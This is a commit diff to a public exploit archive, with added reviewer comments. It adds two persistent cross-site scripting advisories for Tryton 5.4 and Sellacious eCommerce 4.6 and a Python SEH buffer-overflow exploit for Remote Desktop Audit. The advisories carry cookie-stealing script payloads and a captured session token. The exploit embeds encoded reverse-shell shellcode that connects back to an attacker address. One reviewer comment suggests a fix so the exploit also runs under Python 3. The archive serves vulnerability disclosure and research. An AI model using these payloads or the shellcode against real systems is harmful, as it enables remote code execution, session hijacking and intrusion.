DB: 2020-05-14
4 changes to exploits/shellcodes

Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
Tryton 5.4 - Persistent Cross-Site Scripting
Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting

parent f564ddfd17
commit fe5d64b70c
5 changed files with 385 additions and 7 deletions
@ -37,10 +37,4 @@ Parameter: id (GET)
[08:55:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12

I am looking forward to you accepting and approving my PoC.

Thankyou!

Vu Tien Hoa
back-end DBMS: MySQL >= 5.0.12
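Review bot: the file header for this hunk is not visible on the page, so the entry being trimmed cannot be identified from what is shown; the removed block (the submitter's closing request "I am looking forward to you accepting and approving my PoC." through the "Vu Tien Hoa" sign-off) is correspondence rather than exploit content, so dropping it is the right call. The "back-end DBMS: MySQL >= 5.0.12" line appears both before and after the removed block, which suggests it was rewritten rather than left untouched (for example a changed end-of-file newline); worth confirming that no whitespace drift was introduced at the new end of the file.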
exploits/php/webapps/48466.txt (new normal file, 171 lines)
@ -0,0 +1,171 @@
# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-05-13
# Vendor Homepage: https://www.tryton.org/
# Version: 5.4
# Software Link: https://www.tryton.org/download


Document Title:
===============
Tryton v5.4 - (Name) Persistent Cross Site Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2233


Common Vulnerability Scoring System:
====================================
4.4


Product & Service Introduction:
===============================
https://www.tryton.org/ & https://www.tryton.org/download


Affected Product(s):
====================
Tryton Foundation
Product: Tryton v5.4 - CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-05-12: Public Disclosure (Vulnerability Laboratory)


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Tryton v5.4 web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.

The persistent vulnerability is located in the `name` parameter of the
`User Profile` module. Remote attackers with low
privileges are able to inject own malicious persistent script code as
name for user accounts. The injected code can be
used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector
is located on the application-side. Injection point is the profile input
field with the name value and the execute occurs
in the front ui on top right were the avatar is listed or in the admin
backend on the res.user;name="Users"&views.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] User Profile

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] /index
[+] /model/res.user;name="Users"&views (backend)


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the application and login to your low privileged user account
2. Move to the profile on top right side (click)
3. Inject test payload to the "Name" input field and save the entry
4. Execution occurs after save on top right and
/model/res.user;name="Users"&views of the admin backend
5. Successful reproduce of the persistent cross site vulnerability!


PoC: Payload
%20>"><img%20src="evil.source%20onload=alert(document.cookie)>


PoC: Vulnerable Source (Execution Point)
<div class="input-group input-group-sm"><span
class="input-group-btn"><button type="button" class="btn
btn-default">Filters</button></span>
<input class="form-control mousetrap" placeholder="Search"
autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist>
<span class="input-group-btn"><button type="button" class="btn
btn-default hidden-md hidden-lg" aria-label="Clear Search"
title="Clear Search" style="display: none;"><img class="icon"
src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button>
<button type="submit" class="btn btn-default" aria-label="Search"
title="Search"><img class="icon"
src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button
class="btn btn-default hidden-xs"
type="button" title="Bookmark this filter" aria-label="Bookmark this
filter"><img class="icon" aria-hidden="true"
src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button
type="button" class="btn btn-default
dropdown-toggle" data-toggle="dropdown" aria-expanded="false"
aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled="">
<img aria-hidden="true" class="icon"
src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button>
<ul class="dropdown-menu dropdown-menu-right" role="menu"
aria-labelledby="bookmarks"></ul><button type="button"
class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show
inactive records" title="Show inactive records">
<img aria-hidden="true" class="icon"
src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div>


--- PoC Session Logs [POST] ---
https://tryton.localhost:8080/tryton/
Host: tryton.localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Session
ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM=
X-Requested-With: XMLHttpRequest
Content-Length: 527
Origin: https://tryton.localhost:8080
Connection: keep-alive
Referer: https://tryton.localhost:8080/
{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">",
"signature":"test
signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1,
"company.rec_name":"Michael Scott Paper
Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10],
"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time":
{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}
-
POST: HTTP/2.0 200 OK
server: nginx/1.16.1
content-type: application/json
access-control-allow-origin: https://tryton.localhost:8080
vary: Origin
content-encoding: gzip


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.




--
VULNERABILITY LABORATORY - RESEARCH TEAM
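Review bot: the "PoC Session Logs [POST]" block keeps the live "Authorization: Session" token of the test instance (the base64 line right under the header); that value should be redacted before the entry is published, the same way credentials are stripped elsewhere in the archive. The block labelled "PoC: Vulnerable Source (Execution Point)" is the search/filter toolbar markup and does not contain the injected `name` value at all, so it does not evidence the execution point the text describes (the avatar area top right or the /model/res.user view); a snippet showing the rendered name would. Minor consistency points: "# Exploit Author: Vulnerability-Lab" versus "Benjamin Kunz Mejri" in "Credits & Authors", and "# Date: 2020-05-13" versus "2020-05-12: Public Disclosure" in the timeline.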
exploits/php/webapps/48467.txt (new normal file, 138 lines)
@ -0,0 +1,138 @@
# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
# Exploit Author: gurbanli
# Date: 2020-05-13
# Vendor Homepage: https://www.sellacious.com
# Version: 4.6
# Software Link: https://www.sellacious.com/free-open-source-ecommerce-software

Document Title:
===============
Sellacious eCommerce - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2226


Common Vulnerability Scoring System:
====================================
4.6


Product & Service Introduction:
===============================
https://www.sellacious.com/free-open-source-ecommerce-software


Vulnerability Disclosure Timeline:
==================================
2020-05-08: Public Disclosure (Vulnerability Laboratory)


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Sellacious eCommerce Shop CMS (2020 Q1).
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.

The cross site web vulnerabilities are located in the all the adress
input fields of the `Manage Your Addresses` module.
Remote attackers are able to register a low privilege user account to
inject own malicious script code to the adress
information page. The execution of the script code occurs each time the
adress information is used in the web ui of
the ecommerce application. The request method to inject is POST and the
attack vector is persistent on the application-side.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of
affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Your Addresses

Vulnerable Input(s):
[+] Full name
[+] First name
[+] Middle name
[+] Last name
[+] Company
[+] PO Box
[+] Address
[+] Landmark

Affected(s):
[+] index.php/manage-your-addresses
[+] Backend user adress information listing


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with user account and low user interaction.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.


PoC: Exploitation
<iframe src="evil.source" onload=alert(document.cookie)>
<iframe src="evil.source" onload=alert(document.domain)>


PoC: Vulnerable Source
<div class="addresses-container">
<div class="address-heading">
<h2>Your addresses
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
<i class="fa fa-plus"></i> <span class="add-address-text">Add New
Address</span></a></h2></div>
<div id="addresses" class="cart-aio ctech-text-center">
<div id="address-editor">
<ul id="address-items" data-original-title="" title=""> <li
class="address-item" id="address-item-9"> <div class="ctech-float-right
address-action">
<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default
hasTooltip remove-address" data-placement="bottom" data-id="9" title=""
data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a
href="#address-form-9" role="button" data-toggle="ctech-modal"
data-placement="bottom"
class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title=""
data-original-title="Edit"><i class="fa fa-edit"></i></a> </div>
<div class="address-content"> <span class="address_name">>"<iframe
src="evil.source"></span> <span class="address_company">>"<iframe
src="evil.source"></span>
<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
<span class="address_address has-comma">>"<iframe src="evil.source"></span>
<span class="address_landmark has-comma">>"<iframe
src="evil.source"></span> <span class="address_country">United
States</span>
<div class="cart_address_box w100p"> <div class="cart_address_buttons">
</div> </div> </div> </li> <li class="address-item odd-address-item">
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
class="btn-new-address"><i class="fa fa-plus"></i></a> </li>
</iframe></span></div></li></ul>
<div class="ctech-wrapper">
</div><div class="ctech-clearfix"></div>
</div><div class="ctech-clearfix"></div>
</div></div>


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.



--
VULNERABILITY LABORATORY - RESEARCH TEAM
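Review bot: "# Exploit Author: gurbanli" contradicts the file's own "Credits & Authors" section (Vulnerability-Lab / Benjamin Kunz Mejri) and the files.csv row added for 48467 in this same commit, which lists Vulnerability-Lab; the header looks carried over from the 48465.py template and should be corrected so the archive metadata and the advisory agree. "# Date: 2020-05-13" likewise differs from the "2020-05-08: Public Disclosure" timeline entry. Two smaller points: "adress" is misspelled throughout the description and module list, and the "PoC: Vulnerable Source" block ends with "</iframe></span></div></li></ul>", closing elements the snippet never opened, so it reads as a truncated paste.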
exploits/windows/local/48465.py (new executable file, 72 lines)
@ -0,0 +1,72 @@
# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: Remote Desktop Audit 2.3.0.157
# Vendor Homepage: https://lizardsystems.com
# Version: 2.3.0.157
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
# Tested on: Windows 7 x86
f = file('payload.txt','w')

"""
Same with LanSend 3.2, but with different ppr address.
PoC
1. Run exploit
2. Run Remote Desktop Audit and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed

"""

"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
"""

shellcode = b""
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"

"""
047FFF09 59 POP ECX
047FFF0A 59 POP ECX
047FFF0B 80C1 64 ADD CL,64
047FFF0E ^FFE1 JMP ECX
"""
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'

"""ppr 00418230"""

payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41'
f.write(payload)
f.close()
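Review bot: the script only runs under Python 2. `file('payload.txt','w')` does not exist in Python 3, and `payload = '\x90' * 30 + shellcode + jmp_to_shellcode + ...` concatenates str fragments with the bytes `shellcode`, which raises TypeError there; `open('payload.txt', 'wb')` with every fragment written as bytes would make it work on both. The file is also opened in text mode, so on Windows any 0x0a byte in the buffer would be written as CR LF; the msfvenom badchars only protect the shellcode, not the padding, jump stub or addresses, so binary mode is the safer default. Minor: "Same with LanSend 3.2, but with different ppr address" leaves the offset and buffer-length reasoning in the other entry, and the msfvenom line hardcodes lhost=172.16.74.128, which readers will need to change.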
@ -11070,6 +11070,7 @@ id,file,description,date,author,type,platform,port
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
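Review bot: the new 48465 row is inserted between 48448 and 48461, which breaks the ascending id order of the surrounding rows (48415, 48418, 48448, then 48461, 48464); it belongs after 48464, just before the "1,exploits/windows/remote/1.c" line that opens the next section. Its date, 2020-05-13, also disagrees with the "# Date: 2020-05-12" header in exploits/windows/local/48465.py added in this same commit; one of the two should be corrected.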
@ -42694,3 +42695,5 @@ id,file,description,date,author,type,platform,port
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
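Review bot: the 48467 row credits Vulnerability-Lab while the header of exploits/php/webapps/48467.txt in this commit reads "# Exploit Author: gurbanli"; the csv and the file should agree, and the file's own "Credits & Authors" section points to Vulnerability-Lab, so the file header is the likely error. The 2020-05-13 dates on the 48466 and 48467 rows match the "# Date:" headers of both files but not the disclosure timelines inside them (2020-05-12 and 2020-05-08); fine if the csv date is meant to be the archive date, but worth stating which it is.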